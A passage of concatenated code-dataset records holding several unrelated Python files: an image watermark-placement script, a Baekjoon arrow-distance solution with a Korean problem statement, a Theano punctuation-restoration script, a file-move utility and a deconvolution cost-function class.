overlapped_blocks = list(filter(\n lambda bl: whether_rectangles_overlap(bl, potential_mark_rect),\n 
cur_scl_not_suitable_blocks\n ))\n if len(overlapped_blocks) == 0:\n # ROI - region of interest, it's an input image\n # fragment.\n gr_roi = gr_img[\n y:y + scaled_mark_height, x:x + scaled_mark_width\n ].flatten()\n edges_roi = edges_img[\n y:y + scaled_mark_height, x:x + scaled_mark_width\n ].flatten()\n dark_pxls_amount = (gr_roi < c.DARK_PXLS_THRESHOLD).sum()\n too_many_dark_pxls = dark_pxls_amount > c.DARK_PXLS_ALLOWED_AMOUNT\n edge_pxls_amount = (edges_roi > 0).sum()\n too_many_edges = edge_pxls_amount > c.EDGE_PXLS_ALLOWED_AMOUNT\n if (not args.consider_dark_pxls or not too_many_dark_pxls) and (not args.consider_edges or not too_many_edges):\n suitable_areas.append(\n {\n 'rect_coords': potential_mark_rect,\n 'wmark_scale': wmark_scale\n }\n )\n x += scaled_mark_width - c.STEP\n cur_scl_not_suitable_blocks.add(\n potential_mark_rect\n )\n x += c.STEP\n unsuitable_blocks |= cur_scl_not_suitable_blocks\n y += c.STEP\n spinner.next()\n spinner.finish()\n return suitable_areas\n\n\ndef insert_watermarks(input_img_path):\n print(f'\"{input_img_path}\" is being processed...')\n input_img_path = os.path.join(\n c.PROGRAM_DIR, args.input_dir, input_img_path\n )\n input_img = cv2.imread(input_img_path)\n input_img_h, input_img_w = input_img.shape[:2]\n # Add transparency to the input image.\n input_img = np.dstack(\n [input_img, np.ones((input_img_h, input_img_w), dtype='uint8') * 255]\n )\n # The processed images are used in suitable area checks.\n gr_input_img = cv2.cvtColor(input_img, cv2.COLOR_RGB2GRAY)\n blurred_gr_input_img = cv2.GaussianBlur(gr_input_img, (5, 5), 0)\n edges_input_img = cv2.Canny(\n blurred_gr_input_img, c.CANNY_THRESHOLD_1, c.CANNY_THRESHOLD_2\n )\n # Detecting words.\n unsuitable_blocks = set()\n if args.use_OCR:\n print(f'{input_img_path} text detecting in progress...')\n data = pytesseract.image_to_data(input_img, lang='eng+rus')\n for word_info in data.splitlines()[1:]:\n word_info = word_info.split()\n if len(word_info) == 12:\n x, y, width, height = map(int, word_info[6:10])\n unsuitable_blocks.add((x, y, x + width, y + height))\n\n suitable_areas = find_suitable_areas(\n unsuitable_blocks, input_img_w, input_img_h, gr_input_img,\n edges_input_img\n )\n if len(suitable_areas) != 0:\n # Watermark partial coverage.\n areas_to_use_amount = round(round(args.used_areas_percentage / 100, 3) * len(suitable_areas))\n # If areas_to_use_amount is 0, make it 1.\n areas_to_use_amount = areas_to_use_amount or 1\n shuffle(suitable_areas)\n suitable_areas = suitable_areas[:areas_to_use_amount]\n\n # Draw suitable area outlines.\n if c.SHOW_WMARK_AREA_OUTLINES:\n for s_area in suitable_areas:\n cv2.rectangle(\n input_img, s_area['rect_coords'][:2],\n s_area['rect_coords'][2:],\n (255, 0, 0), 1\n )\n\n # Insert one or more watermarks.\n overlay = np.zeros((input_img_h, input_img_w, 4), dtype='uint8')\n for s_area in suitable_areas:\n overlay[\n s_area['rect_coords'][1]:s_area['rect_coords'][3],\n s_area['rect_coords'][0]:s_area['rect_coords'][2]\n ] = scaled_wmark_imgs[s_area['wmark_scale']]\n\n # Make black areas where watermark will be inserted.\n (ov_B, ov_G, ov_R, ov_A) = cv2.split(overlay)\n (img_B, img_G, img_R, img_A) = cv2.split(input_img)\n ov_A_wm_absence = ov_A == 0\n input_img = cv2.merge([\n img_B * ov_A_wm_absence, img_G * ov_A_wm_absence,\n img_R * ov_A_wm_absence, img_A\n ])\n # Create image by cutting out watermark areas in input image.\n ov_A_wm_presence = ov_A != 0\n img_B *= ov_A_wm_presence\n img_G *= ov_A_wm_presence\n img_R *= ov_A_wm_presence\n 
inp_img_cutout = cv2.merge([img_B // 2, img_G // 2, img_R // 2, img_A])\n # cv2.imshow(f'inp_img_cutout for {input_img_path}', inp_img_cutout)\n\n # Blend the input image with the overlay.\n cv2.addWeighted(overlay, .7, input_img, 1.0, 0, input_img)\n cv2.addWeighted(inp_img_cutout, .7, input_img, 1.0, 0, input_img)\n # cv2.imshow(f'result for {input_img_path}', input_img)\n # cv2.waitKey(0)\n\n # Save image with inserted watermark.\n inpt_img_name = input_img_path[input_img_path.rfind(os.path.sep) + 1:]\n result_img_path = os.path.join(\n c.PROGRAM_DIR, args.output_dir,\n f'{inpt_img_name.partition(\".\")[0]}_processed.png'\n )\n cv2.imwrite(result_img_path, input_img)\n else:\n print(f'WARNING: image {input_img_path} has no suitable space to insert watermarks!')\n\n\nif __name__ == '__main__':\n if args.use_OCR:\n pytesseract.pytesseract.tesseract_cmd = args.tesseract_path\n # Check paths for existence.\n if not os.path.exists(args.wm_path):\n print('ERROR: Such watermark image file doesn\\'n exist!')\n exit(1)\n if not os.path.exists(args.input_dir):\n print(f'ERROR: \"{args.input_dir}\" directory doesn\\'t exist! Specify '\n 'another path for input images directory or create it and move '\n 'images there.')\n exit(2)\n if not os.path.exists(args.output_dir):\n os.makedirs(args.output_dir)\n\n # Read watermark image.\n wmark_img = cv2.imread(args.wm_path, cv2.IMREAD_UNCHANGED)\n (wm_h, wm_w) = wmark_img.shape[:2]\n # Opacity bug correction.\n (B, G, R, A) = cv2.split(wmark_img)\n B = cv2.bitwise_and(B, B, mask=A)\n G = cv2.bitwise_and(G, G, mask=A)\n R = cv2.bitwise_and(R, R, mask=A)\n wmark_img = cv2.merge([B, G, R, A])\n\n # Get scaled watermarks.\n scaled_wmark_imgs = get_scaled_watermarks(wmark_img, args.min_wm_scale)\n\n # Process all images placed in input images directory.\n input_files = os.listdir(args.input_dir)\n # Filter images among all files existing in the directory.\n input_imgs = list(filter(\n lambda file: file[file.rfind('.') + 1:] in c.ACCEPTABLE_FILE_EXTENSIONS,\n input_files\n ))\n if len(input_imgs) == 0:\n print(f'ERROR: \"{args.input_dir}\" directory has no images!')\n exit(3)\n\n for input_img_path in input_imgs:\n insert_watermarks(input_img_path)\n\n print(f'Elapsed time is {time() - c.START_TIME} seconds.', end='\\n\\n')\n","repo_name":"LaHesis/WatermarksAllocator","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":9674,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"9916438381","text":"# 화살표 그리기\r\n\"\"\"\r\n직선 위에 위치를 나타내는 0, 1, 2, ...와 같은 음수가 아닌 정수들이 일정한 간격으로 오른쪽 방향으로 놓여 있다.\r\n이러한 위치들 중 N개의 위치에 하나씩 점들이 주어진다(<그림 1>). 주어진 점들의 위치는 모두 다르다.\r\n두 점 사이의 거리는 두 점의 위치를 나타내는 수들의 차이이다. <그림 1>에서는 4개의 점이 주어지고 점 a와 b의 거리는 3이다.\r\n\r\n<그림 1>\r\n각 점은 N개의 색깔 중 하나를 가진다. 편의상, 색깔은 1부터 N까지의 수로 표시한다.\r\n각 점 p에 대해서, p에서 시작하는 직선 화살표를 이용해서 다른 점 q에 연결하려고 한다. 여기서, 점 q는 p와 같은 색깔의 점들 중 p와 거리가 가장 가까운 점이어야 한다.\r\n만약 가장 가까운 점이 두 개 이상이면 아무거나 하나를 선택한다.\r\n모든 점에 대해서 같은 색깔을 가진 다른 점이 항상 존재한다. 따라서 각 점 p에서 시작하여 위 조건을 만족하는 q로 가는 하나의 화살표를 항상 그릴 수 있다.\r\n예를 들어, 점들을 순서쌍 (위치, 색깔) 로 표시할 때, a = (0,1), b = (1, 2), c = (3, 1), d = (4, 2), e = (5, 1)라고 하자.\r\n아래 <그림 2>에서 이 점들을 표시한다. 여기서 흰색은 1, 검은색은 2에 해당된다\r\n\r\n<그림 2>\r\n위의 조건으로 화살표를 그리면, 아래 <그림 3>과 같이 점 a의 화살표는 c로 연결된다. 점 b와 d의 화살표는 각각 d와 b로 연결된다.\r\n또한 점 c와 e의 화살표는 각각 e와 c로 연결된다. 
따라서 모든 화살표들의 길이 합은 3 + 3 + 2 + 3 + 2 = 13이다.\r\n\r\n<그림 3>\r\n점들의 위치와 색깔이 주어질 때, 모든 점에서 시작하는 화살표들의 길이 합을 출력하는 프로그램을 작성하시오.\r\n\"\"\"\r\nimport sys\r\n\r\npoints = []\r\nN = int(sys.stdin.readline().rstrip())\r\nfor _ in range(N):\r\n points.append(tuple(list(map(int, sys.stdin.readline().rstrip().split()))))\r\npoints.sort(key=lambda x: x[0])\r\n\r\n\r\ndef get_distance_sum(array_points):\r\n left_distance = float('inf')\r\n result = 0\r\n for i in range(len(array_points)):\r\n if i + 1 < len(array_points):\r\n right_distance = abs(array_points[i + 1][0] - array_points[i][0])\r\n result += min(left_distance, right_distance)\r\n left_distance = right_distance\r\n else:\r\n result += left_distance\r\n\r\n return result\r\n\r\n\r\nresult = 0\r\nfor i in range(1, N + 1):\r\n same_colored_points = []\r\n for j in range(N):\r\n if points[j][1] == i:\r\n same_colored_points.append(points[j])\r\n result += get_distance_sum(same_colored_points)\r\n\r\nprint(result)\r\n","repo_name":"JunInMay/journey-to-baekjoon","sub_path":"baekjoon/baekjoon_15970.py","file_name":"baekjoon_15970.py","file_ext":"py","file_size_in_byte":2763,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"2756653681","text":"# coding: utf-8\nfrom __future__ import division\nimport sys\nimport os\nimport codecs\nfrom optparse import OptionParser\nfrom utilities import *\nimport models as models\n\nimport theano\nimport theano.tensor as T\nimport numpy as np\n\nMAX_SEQUENCE_LENGTH = 50\n\ndef restore_unsequenced_test_data(test_data_path, word_vocabulary, predict_function, with_pause_feature, semitone_feature_names, write_groundtruth, sequence_length, output_text=None, output_pickle=None):\n\tproscript_data = read_proscript(test_data_path)\n\n\tpause_bins = create_pause_bins()\n\tsemitone_bins = create_semitone_bins()\n\n\tword_sequence = proscript_data['word'] + [END]\n\tpause_sequence = convert_value_to_level_sequence(proscript_data[PAUSE_FEATURE_NAME], pause_bins) + [0]\n\totherfeatures_sequences = [convert_value_to_level_sequence(proscript_data[feature_name], semitone_bins) + [0] for feature_name in semitone_feature_names]\n\n\ti = 0\n\twith codecs.open(output_text, 'w', 'utf-8') as f_out:\n\t\twhile True:\n\t\t\tsubsequence_words = word_sequence[i: i + sequence_length]\n\t\t\tsubsequence_wordIds = [word_vocabulary.get(w, word_vocabulary[UNK]) for w in subsequence_words]\n\t\t\t\n\t\t\tsubsequence_pauses = pause_sequence[i: i + sequence_length]\n\n\t\t\t#if write_groundtruth:\n\t\t\t#\tsubsequence_gold_reduced_puncIds = test_data['punc.red.id'][i: i + sequence_length]\n\t\t\t#\tsubsequence_gold_puncIds = test_data['punc.id'][i: i + sequence_length]\n\t\t\tother_subsequences = [otherfeatures_sequences[feature_index][i: i + sequence_length] for feature_index in range(len(semitone_feature_names))]\n\n\t\t\tif len(subsequence_wordIds) == 0:\n\t\t\t\tbreak\n\n\t\t\tif not with_pause_feature:\n\t\t\t\ty = predict_function(to_array(subsequence_wordIds))\n\t\t\telse:\n\t\t\t\tif len(other_subsequences) == 0:\n\t\t\t\t\ty = predict_function(to_array(subsequence_wordIds), to_array(subsequence_pauses))\n\t\t\t\tif len(other_subsequences) == 1:\n\t\t\t\t\ty = predict_function(to_array(subsequence_wordIds), to_array(subsequence_pauses), to_array(other_subsequences[0]))\n\t\t\t\tif len(other_subsequences) == 2:\n\t\t\t\t\ty = predict_function(to_array(subsequence_wordIds), to_array(subsequence_pauses), to_array(other_subsequences[0]), to_array(other_subsequences[1]))\n\t\t\t\tif 
len(other_subsequences) == 3:\n\t\t\t\t\ty = predict_function(to_array(subsequence_wordIds), to_array(subsequence_pauses), to_array(other_subsequences[0]), to_array(other_subsequences[1]), to_array(other_subsequences[2]))\n\t\t\t \n\t\t\tpredicted_punctuation_sequence = [0] + [np.argmax(y_t.flatten()) for y_t in y]\n\t\t\t#print(predicted_punctuation_sequence)\n\n\t\t\tf_out.write(subsequence_words[0])\n\n\t\t\tlast_eos_idx = 0\n\t\t\tpunctuations = []\n\t\t\tfor y_t in y:\n\n\t\t\t\tp_i = np.argmax(y_t.flatten())\n\t\t\t\t#punctuation = reverse_punctuation_vocabulary[p_i]\n\t\t\t\tpunctuation = p_i\n\n\t\t\t\tpunctuations.append(punctuation)\n\n\t\t\t\tif punctuation in EOS_PUNCTUATION_CODES:\n\t\t\t\t\tlast_eos_idx = len(punctuations) # we intentionally want the index of next element\n\n\t\t\tif subsequence_words[-1] == END:\n\t\t\t\tstep = len(subsequence_words) - 1\n\t\t\telif last_eos_idx != 0:\n\t\t\t\tstep = last_eos_idx\n\t\t\telse:\n\t\t\t\tstep = len(subsequence_words) - 1\n\n\t\t\tfor j in range(step):\n\t\t\t\tif options.readable_format:\n\t\t\t\t\tif punctuations[j] == 0:\n\t\t\t\t\t\tf_out.write(\" \")\n\t\t\t\t\telse:\n\t\t\t\t\t\tf_out.write(PUNCTUATION_VOCABULARY[punctuations[j]] + \" \")\n\t\t\t\telse:\n\t\t\t\t\tf_out.write(\" \" + PUNCTUATION_VOCABULARY[punctuations[j]] + \" \")\n\t\t\t\tif j < step - 1:\n\t\t\t\t\ttry: \n\t\t\t\t\t\tf_out.write(subsequence_words[1+j])\n\t\t\t\t\texcept:\n\t\t\t\t\t\tf_out.write(\"\")\n\t\t\t\t\t\tprint(subsequence_words[1+j])\n\n\t\t\tif subsequence_words[-1] == END:\n\t\t\t\tbreak\n\n\t\t\ti += step\n\ndef main(options):\n\tif checkArgument(options.model_file):\n\t\tmodel_file = options.model_file\n\telse:\n\t\tsys.exit(\"Model file path argument missing\")\n\n\tif checkArgument(options.vocabulary_file):\n\t\tWORD_VOCAB_FILE = options.vocabulary_file\n\telse:\n\t\tsys.exit(\"Vocabulary file path argument missing\")\n\n\tif checkArgument(options.input_proscript, isFile=True):\n\t\tTEST_FILE = options.input_proscript\n\telse:\n\t\tsys.exit(\"File to punctuate is missing!\")\n\n\tif checkArgument(options.output_file):\n\t\toutput_file = options.output_file\n\telse:\n\t\tsys.exit(\"Output file path argument missing\")\n\n\tword_vocabulary = read_vocabulary(WORD_VOCAB_FILE)\n\n\tprint(\"Model: %s\"%model_file)\n\tprint(\"Test file: %s\"%TEST_FILE)\n\n\tx = T.imatrix('x')\n\tp = None\n\ta = None\n\tb = None\n\tc = None\n\n\tsemitone_feature_names = options.semitone_features\n\tnum_semitone_features = len(semitone_feature_names)\n\n\tif options.trained_with_pause:\n\t\tprint(\"Punctuating with pause\")\n\t\tp = T.imatrix('p')\n\telse:\n\t\tnum_semitone_features = -1\n\n\tprint(\"Semitone features (%i):\"%num_semitone_features)\n\n\tif num_semitone_features == 1: \n\t\tprint(\"Punctuating with %s\"%(options.semitone_features[0]))\n\t\ta = T.imatrix('a')\n\telif num_semitone_features == 2:\n\t\tprint(\"Punctuating with %s\"%(options.semitone_features[0]))\n\t\ta = T.imatrix('a')\n\t\tprint(\"Punctuating with %s\"%(options.semitone_features[1]))\n\t\tb = T.imatrix('b')\n\telif num_semitone_features == 3: \n\t\tprint(\"Punctuating with %s\"%(options.semitone_features[0]))\n\t\ta = T.imatrix('a')\n\t\tprint(\"Punctuating with %s\"%(options.semitone_features[1]))\n\t\tb = T.imatrix('b')\n\t\tprint(\"Punctuating with %s\"%(options.semitone_features[2]))\n\t\tc = T.imatrix('c')\n\telif num_semitone_features > 3:\n\t\tsys.exit(\"Too many features (for now)\")\n\n\tprint(\"Loading model parameters...\")\n\tnet, _ = models.load(model_file, 1, x, p=p, 
feature_a=a, feature_b=b, feature_c=c, num_semitone_features=num_semitone_features)\n\tinputs = [x] + [i for i in [p,a,b,c] if not i == None]\n\n\tprint(\"Building model...\")\n\tpredict = theano.function(inputs=inputs, outputs=net.y)\n\n\tprint(\"Generating punctuation...\")\n\t#restored_data = restore_sequenced_test_data(TEST_FILE, \n\t#\t\t\t\t\t\t\t\t\t\t\tpredict_function=predict, \n\t#\t\t\t\t\t\t\t\t\t\t\twith_pause_feature=options.trained_with_pause, \n\t#\t\t\t\t\t\t\t\t\t\t\tsemitone_feature_names=semitone_feature_names, \n\t#\t\t\t\t\t\t\t\t\t\t\treduced_punctuation=options.reduced_punctuation)\n\n\trestore_unsequenced_test_data(TEST_FILE,\n\t\t\t\t\t\t\t\t word_vocabulary=word_vocabulary,\n\t\t\t\t\t\t\t\t predict_function=predict, \n\t\t\t\t\t\t\t\t with_pause_feature=options.trained_with_pause, \n\t\t\t\t\t\t\t\t semitone_feature_names=semitone_feature_names, \n\t\t\t\t\t\t\t\t write_groundtruth=True,\n\t\t\t\t\t\t\t\t sequence_length=MAX_SEQUENCE_LENGTH,\n\t\t\t\t\t\t\t\t output_text=options.output_file)\n\n\tprint(\"Predictions written to %s.\"%output_file)\n\nif __name__ == \"__main__\":\n\tusage = \"usage: %prog [-s infile] [option]\"\n\tparser = OptionParser(usage=usage)\n\tparser.add_option(\"-m\", \"--model_file\", dest=\"model_file\", default=None, help=\"model filename\", type=\"string\")\n\tparser.add_option(\"-v\", \"--vocabulary_file\", dest=\"vocabulary_file\", default=None, help=\"vocabulary file (pickle)\", type=\"string\")\n\tparser.add_option(\"-i\", \"--input_proscript\", dest=\"input_proscript\", default=None, help=\"input proscript file (csv)\", type=\"string\")\n\tparser.add_option(\"-o\", \"--output_file\", dest=\"output_file\", default=100, help=\"output file to write predictions\", type=\"string\")\n\tparser.add_option(\"-p\", \"--trained_with_pause\", dest=\"trained_with_pause\", default=False, help=\"flag if trained with pause\", action=\"store_true\")\n\tparser.add_option(\"-f\", \"--semitone_features\", dest=\"semitone_features\", default=[], help=\"semitone feature names\", type=\"string\", action='append')\n\tparser.add_option(\"-r\", \"--readable_format\", dest=\"readable_format\", default=False, help=\"flag if output is desired in human readable format\", action='store_true')\n\n\t(options, args) = parser.parse_args()\n\n\tmain(options)","repo_name":"alpoktem/krisPunctuator","sub_path":"punctuator.py","file_name":"punctuator.py","file_ext":"py","file_size_in_byte":7423,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"15449025934","text":"import argparse\nimport datetime\nimport logging\nimport os\nimport shutil\nimport sys\nimport traceback\nimport asys\n\nglobal version\nglobal logger\n\nlogger = logging.getLogger('movefile')\nlogging.basicConfig(format='%(asctime)s - %(name)s - %(levelname)s - %(message)s', level=logging.DEBUG)\n\n# @Author: John Gooch\n# @Created: 20120613\n# @Updated: 20130911\nversion = \"3.4\"\n\n\n# @Name: File Move Script\n# @Description: Move file(s) from one folder to another, optionally adding a timestamp or throwing an error if no files are moved.\n# 20120904 - Added \"-o\" overwrite switch to permit overwriting existing files of the same name/path as the source.\n# 2.3 20121231 File output file name when timestamp is used. replaced string join with os.path.join when creating file paths.\n# 2.4 20130106\n# Fixed spelling errors in output messages..\n# 2.5 20130404\n# Replaced exit codes for failurs with exceptions. 
replaced os.rename with shutil.move , added timestamp formatting option\n# 3.0 20130710\n# Added Type option to specify special single file processing modes, such as NEWEST, OLDEST, etc. added findfiles to create list\n# of files to move, and removed file selection logic from the movefiles function\n# 3.1 20130904\n# Added -n negative logic to tell the script to move files that do not match the pattern.\n# 3.2 20130906\n# Remove local setGV function and replaced it with one imported from asys module. move error checking and setgv to top of main function from movefile\n# 3.3 20140326 #added prepend function and changed location of appended timestamp\n# @3.4 20140502 - Logging and moved common functions into asys module.\n\ndef initCLI():\n parser = argparse.ArgumentParser(description='File Move utility')\n parser.add_argument('-v', '--version', action='version', version='%(prog)s {version}'.format(version=version))\n parser.add_argument('-s', action=\"store\", dest=\"src_file_path\", required=True, help='path of the files to move.')\n parser.add_argument('-d', action=\"store\", dest=\"dst_file_path\", required=True,\n help='path of the folder to move files to')\n parser.add_argument('-m', action=\"store\", dest=\"src_file_mask\", required=True,\n help='File name mask for files to move.')\n parser.add_argument('-l', action=\"store\", dest=\"level\", default=\"INFO\", required=False,\n help=\"Sets the logging level for the script. Default is INFO\")\n parser.add_argument('-o', action=\"store_true\", dest=\"overwrite\", required=False, default=False,\n help=\"Cause existing file of the same name/path to be overwritten.\")\n parser.add_argument('-t', action=\"store_true\", dest=\"timestamp\", required=False, default=False,\n help='Flag to append current data and time to file name')\n parser.add_argument('-T', action=\"store\", dest=\"type\", required=False, default=\"ALL\",\n help='Specifies processing mode for files. Default is ALL. Other options are OLDEST(single) NEWEST(single)')\n parser.add_argument('-e', action=\"store_true\", dest=\"error\", required=False, default=False,\n help='Flag to throw an error if no files are moved.')\n parser.add_argument('-f', action=\"store\", dest=\"format\", default=\"%Y%m%d\", required=False,\n help='Format for timestamp, if timestamp is enabled.')\n parser.add_argument('-n', action=\"store_true\", dest=\"negativelogic\", default=False, required=False,\n help='Work on filenames that do not match pattern.')\n parser.add_argument('-p', action=\"store_true\", dest=\"prepend\", default=False,\n help='Prepend timestamp to source file name.')\n args = parser.parse_args()\n return args\n\n\ndef initLogging(level):\n if not level:\n logger.setLevel(logging.WARNING)\n elif (level == \"DEBUG\"):\n logger.setLevel(logging.DEBUG)\n elif (level == \"INFO\"):\n logger.setLevel(logging.INFO)\n elif (level == \"WARNING\"):\n logger.setLevel(logging.WARNING)\n elif (level == \"ERROR\"):\n logger.setLevel(logging.ERROR)\n elif (level == \"CRITICAL\"):\n logger.setLevel(logging.CRITICAL)\n else:\n raise Exception(\"Exception setting logging level. 
Unrecognised level %s was specified\" % (level))\n return\n\n\ndef moveFiles(src_path, files, dst_path, timestamp, error, overwrite, format, prepend):\n logger.debug(\"original src_path=%s\" % (src_path))\n logger.debug(\"original dst_path=%s\" % (dst_path))\n moved_files = [] # list of source files moved\n skipped_files = []\n src_path = os.path.realpath(src_path)\n dst_path = os.path.realpath(dst_path)\n logger.debug(\"real src_path=%s\" % (src_path))\n logger.debug(\"real dst_path=%s\" % (dst_path))\n if os.path.exists(src_path) == False:\n logger.error(\"Source path %s is not accessible. Check path and permissions.\" % (src_path))\n raise Exception(\"Source path %s is not accessible. Check path and permissions.\" % (src_path))\n else:\n logger.debug(\"Source path %s exists.\" % (src_path))\n\n if os.path.exists(dst_path) == False:\n logger.error(\"Destination path %s is not accessible. Check path and permissions.\" % (dst_path))\n raise Exception(\"Destination path %s is not accessible. Check path and permissions.\" % (dst_path))\n else:\n logger.debug(\"Destination path %s exists.\" % (dst_path))\n logger.debug(\"Current working directory is %s\" % (os.getcwd()))\n logger.debug(\"Found %s files in %s \" % (len(files), src_path))\n for file in files:\n src_file_path = os.path.join(src_path, file)\n # if os.path.isfile(src_file_path) == False:\n # logger.debug( \"%s is not a regular file. Skipping.\" % ( src_file_path ) )\n # continue\n dst_filename = file\n if timestamp == True:\n (first_part, extension) = os.path.splitext(dst_filename)\n logger.debug(\"Result of splitext command on filename %s is basename %s extension %s\" % (\n dst_filename, first_part, extension))\n current_time = getTimestamp(format)\n if prepend:\n dst_filename = \"%s%s%s\" % (current_time, first_part, extension)\n else:\n dst_filename = \"%s%s%s\" % (first_part, extension, current_time)\n dst_file_path = os.path.join(dst_path, dst_filename)\n # if a file with the same name exists at the destination and overwrite is disabled, skip file\n if os.path.exists(dst_file_path) and not overwrite:\n logger.debug(\"Destination file %s already exists and overwrite is disabled. Skipping...\" % (dst_file_path))\n skipped_files.append(src_file_path)\n continue\n elif os.path.exists(dst_file_path) and overwrite:\n logger.debug(\"Overwriting destination file %s.\" % (dst_file_path))\n # move the file\n try:\n shutil.move(src_file_path, dst_file_path)\n logger.debug(\"Moved %s to %s\" % (src_file_path, dst_file_path))\n moved_files.append(src_file_path)\n except Exception:\n logger.error(\"Failed to moved file %s to %s\" % (src_file_path, dst_file_path))\n raise\n\n return (moved_files, skipped_files)\n\n\ndef getTimestamp(format):\n now = datetime.datetime.now()\n current_time = now.strftime(format)\n return current_time\n\n\ndef printReport(moved_files, skipped_files, dst_dir_path):\n dst_dir_path = os.path.realpath(dst_dir_path)\n logger.info(\"%d files moved to %s\" % (len(moved_files), dst_dir_path))\n for file in moved_files:\n logger.info(\"%s moved to %s\" % (file, dst_dir_path))\n logger.info(\"%d files skipped.\" % (len(skipped_files)))\n for file in skipped_files:\n logger.info(\"%s skipped.\" % (file))\n\n return 0\n\n\ndef main():\n global logger\n global moved_files\n global skipped_files\n global files\n global args\n print(\"%s version %s\".format(os.path.basename(sys.argv[0]), version))\n try:\n args = initCLI()\n except Exception as err:\n print(\"Failed to initialize the command line parameters. 
Reason %s\".format(str(err)))\n traceback.print_exc()\n return 2\n try:\n initLogging(args.level)\n except Exception as err:\n print(\"Failed to initialize logger. Reason: %s\".format(str(err)))\n traceback.print_exc()\n return 2\n\n try:\n if args.type in \"ALL\":\n files = asys.findFiles(args.src_file_path, args.src_file_mask, -1, args.negativelogic)\n elif args.type in \"OLDEST\":\n files = asys.findFiles(args.src_file_path, args.src_file_mask, 0, args.negativelogic)\n elif args.type in \"NEWEST\":\n files = asys.findFiles(args.src_file_path, args.src_file_mask, 1, args.negativelogic)\n else:\n logger.error(\"Exception. Operation type %s not recognized.\" % (type))\n return 2\n except Exception as err:\n logger.error(\"Exception finding files in %s. Reason: %s.\" % (args.src_file_path, str(err)))\n traceback.print_exc()\n return 2\n\n try:\n (moved_files, skipped_files) = moveFiles(args.src_file_path, files, args.dst_file_path, args.timestamp,\n args.error, args.overwrite, args.format, args.prepend)\n except Exception as err:\n logger.error(\"Failed to move files matching pattern %s from %s to %s. Reason: %s\" % (\n args.src_file_mask, args.src_file_path, args.dst_file_path, str(err)))\n traceback.print_exc()\n return 2\n\n\n try:\n printReport(moved_files, skipped_files, args.dst_file_path)\n except Exception as err:\n logger.error(\"Exception printing file move report. Reason: %s\" % (str(err)))\n traceback.print_exc()\n return 2\n\n if args.error == True and len(moved_files) == 0:\n logger.info(\"%d files found and the error flag is set. Returning 0.\" % (len(moved_files)))\n return 1\n else:\n return 0\n\n\nif __name__ == \"__main__\": main()\n","repo_name":"majorgear/python_scripts","sub_path":"bin/movefile.py","file_name":"movefile.py","file_ext":"py","file_size_in_byte":10010,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"74937719800","text":"# -*- coding: utf-8 -*-\n\n\"\"\"COST FUNCTION\n\nThis module the class for the sf_deconvolveCost cost function.\n\n:Author: Samuel Farrens \n\n:Version: 1.1\n\n:Date: 20/10/2017\n\n\"\"\"\n\nfrom __future__ import print_function\nimport numpy as np\nfrom sf_tools.math.matrix import nuclear_norm\nfrom sf_tools.base.transform import cube2matrix\n\n\nclass sf_deconvolveCost(object):\n\n \"\"\"Cost function class for sf_deonvolve\n\n This class implements the cost function for deconvolution\n\n Parameters\n ----------\n y : np.ndarray\n Input original data array\n operator : function\n Matrix operator function\n wavelet : class, optional\n Wavelet operator class (\"sparse\" mode only)\n weights : np.ndarray, optional\n Array of wavelet thresholding weights (\"sparse\" mode only)\n lambda_lowr : float, optional\n Low-rank regularization parameter (\"lowr\" mode only)\n lambda_psf : float, optional\n PSF estimate regularization parameter (\"psf_unknown\" grad_type only)\n mode : str {'lowr', 'sparse'}, optional\n Deconvolution mode (default is \"lowr\")\n positivity : bool, optional\n Option to test positivity contraint (defult is \"True\")\n verbose : bool\n Option for verbose output (default is \"True\")\n\n \"\"\"\n\n def __init__(self, y, grad, wavelet=None, weights=None, lambda_lowr=None,\n lambda_psf=1, mode='lowr', positivity=True, verbose=True):\n\n self.y = y\n self.grad = grad\n self.wavelet = wavelet\n self.weights = weights\n self.lambda_lowr = lambda_lowr\n self.lambda_psf = lambda_psf\n self.mode = mode\n self.positivity = positivity\n self.verbose = verbose\n\n def 
grad_comp(self, x):\n \"\"\"Calculate gradient component of the cost\n\n This method returns the l2 norm error of the difference between the\n original data and the data obtained after optimisation\n\n Parameters\n ----------\n x : np.ndarray\n Deconvolved data array\n\n Returns\n -------\n float gradient cost component\n\n \"\"\"\n\n l2_norm = np.linalg.norm(self.y - self.grad.H_op(x))\n\n if self.verbose:\n print(' - L2 NORM (Grad):', l2_norm)\n\n return l2_norm\n\n def sparse_comp(self, x):\n \"\"\"Calculate sparsity component of the cost\n\n This method returns the l1 norm error of the weighted wavelet\n coefficients\n\n Parameters\n ----------\n x : np.ndarray\n Deconvolved data array\n\n Returns\n -------\n float sparsity cost component\n\n \"\"\"\n\n x = self.weights * self.wavelet.op(x)\n\n l1_norm = np.sum(np.abs(x))\n\n if self.verbose:\n print(' - L1 NORM:', l1_norm)\n\n return l1_norm\n\n def lowr_comp(self, x):\n \"\"\"Calculate low-rank component of the cost\n\n This method returns the nuclear norm error of the deconvolved data in\n matrix form\n\n Parameters\n ----------\n x : np.ndarray\n Deconvolved data array\n\n Returns\n -------\n float low-rank cost component\n\n \"\"\"\n\n x_prime = cube2matrix(x)\n\n nuc_norm = nuclear_norm(x_prime)\n\n if self.verbose:\n print(' - NUCLEAR NORM:', nuc_norm)\n\n return self.lambda_lowr * nuc_norm\n\n def psf_comp(self):\n \"\"\"Calculate PSF estimation component of the cost\n\n This method returns the l2 norm error of the difference between the\n initial PSF and the estimated PSF\n\n Returns\n -------\n float PSF cost component\n\n \"\"\"\n\n l2_norm = np.linalg.norm(self.grad._psf - self.grad._psf0)\n\n if self.verbose:\n print(' - L2 NORM (PSF):', l2_norm)\n\n return self.lambda_psf * l2_norm\n\n def calc_cost(self, *args):\n \"\"\"Get cost function\n\n This method calculates the cost\n\n Parameters\n ----------\n x : np.ndarray\n Deconvolved data array\n\n Returns\n -------\n float cost\n\n \"\"\"\n\n x = args[0]\n\n if self.positivity and self.verbose:\n print(' - MIN(X):', np.min(x))\n\n cost = 0.5 * self.grad_comp(x) ** 2\n\n if self.mode in ('sparse', 'all'):\n cost += self.sparse_comp(x)\n\n elif self.mode in ('lowr', 'all'):\n cost += self.lowr_comp(x)\n\n if self.grad.grad_type == 'psf_unknown':\n cost += 